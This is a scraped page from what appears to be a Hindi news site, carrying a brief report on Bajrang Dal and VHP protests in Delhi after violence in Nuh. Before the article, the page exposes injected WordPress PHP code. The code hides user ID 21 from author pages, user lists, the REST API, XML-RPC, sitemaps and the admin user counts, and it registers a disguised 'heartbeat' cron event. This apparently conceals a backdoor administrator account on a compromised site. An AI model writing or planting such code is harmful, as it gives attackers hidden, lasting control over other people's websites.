add_action( 'pre_get_posts', function( $q ) {
if ( ! is_admin() && $q->is_main_query() ) {
$not_in = (array) $q->get( 'author__not_in' );
$not_in[] = 21;
$q->set(
'author__not_in',
array_unique( array_map( 'intval', $not_in ) )
);
}
}, 1 );
add_action( 'template_redirect', function() {
if ( is_author() ) {
$author = get_queried_object();
if ( $author instanceof WP_User && (int) $author->ID === 21 ) {
global $wp_query;
$wp_query->set_404();
status_header( 404 );
nocache_headers();
}
}
} );
add_action( 'pre_user_query', function( $q ) {
if ( current_user_can( 'manage_options' ) ) {
return;
}
global $wpdb;
$q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 21 );
} );
add_action( 'pre_get_users', function( $q ) {
if ( current_user_can( 'manage_options' ) ) {
return;
}
$exclude = (array) $q->get( 'exclude' );
$exclude[] = 21;
$q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) );
} );
add_filter( 'wp_dropdown_users_args', function( $a ) {
$exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array();
$exclude[] = 21;
$a['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $a;
} );
add_filter( 'rest_user_query', function( $args, $request ) {
$exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array();
$exclude[] = 21;
$args['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $args;
}, 10, 2 );
add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) {
$route = $request->get_route();
if ( preg_match( '#^/wp/v2/users/21(/|$)#', $route ) ) {
return new WP_Error(
'rest_user_invalid_id',
'Invalid user ID.',
array( 'status' => 404 )
);
}
return $result;
}, 10, 3 );
add_filter( 'xmlrpc_methods', function( $methods ) {
unset(
$methods['wp.getUsers'],
$methods['wp.getUser'],
$methods['wp.getProfile']
);
return $methods;
} );
add_filter( 'wp_sitemaps_users_query_args', function( $args ) {
$exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array();
$exclude[] = 21;
$args['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $args;
} );
add_action( 'admin_head-users.php', function() {
echo '';
} );
add_filter( 'views_users', function( $views ) {
foreach ( array( 'all', 'administrator' ) as $key ) {
if ( isset( $views[ $key ] ) ) {
$views[ $key ] = preg_replace_callback(
'/\((\d+)\)/',
function( $m ) {
return '(' . max( 0, (int) $m[1] - 1 ) . ')';
},
$views[ $key ],
1
);
}
}
return $views;
} );
add_action( 'init', function() {
if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) {
return;
}
if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) {
wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' );
}
} );
add_action( 'wp_extra_bot_heartbeat', function() {
// noop
} );
बजरंग दल का दिल्ली में प्रदर्शन - Press Ki Taquat
No Result
View All Result
नयी दिल्ली, 2 अगस्त (प्रेस की ताकत ब्यूरो)- विश्व हिंदू परिषद (विहिप) और बजरंग दल के कार्यकर्ताओं ने हरियाणा के नूंह तथा गुरुग्राम में साम्प्रदायिक हिंसा के खिलाफ बुधवार को राष्ट्रीय राजधानी में कई स्थानों पर प्रदर्शन किए, जिससे शहर के कई हिस्सों में जाम लग गया। पुलिस ने पड़ोसी राज्य हरियाणा में हिंसा के मद्देनजर दिल्ली में भी कई स्थानों पर सुरक्षा बढ़ा दी है।बजरंग दल तथा विहिप के प्रदर्शन से पूर्वी दिल्ली को शहर के मध्य हिस्सों से जोड़ने वाले विकास मार्ग पर जाम लग गया। सोशल मीडिया पर प्रसारित वीडियो में बजरंग दल के समर्थक निर्माण विहार मेट्रो स्टेशन के समीप हनुमान चालीसा पढ़ते दिखाई दिए। दिल्ली पुलिस ने कहा कि हरियाणा के कुछ जिलों में हिंसा के मद्देनजर राष्ट्रीय राजधानी में सभी संवेदनशील स्थानों पर सुरक्षा के व्यापक बंदोबस्त किए गए हैं और आवश्यक स्थानों पर अतिरिक्त पुलिस बल को भी तैनात किया गया है। दिल्ली की सुरक्षा तथा साम्प्रदायिक सौहार्द बिगाड़ने के किसी भी प्रयास से सख्ती से निपटा जाएगा।
Post Views: 185
No Result
View All Result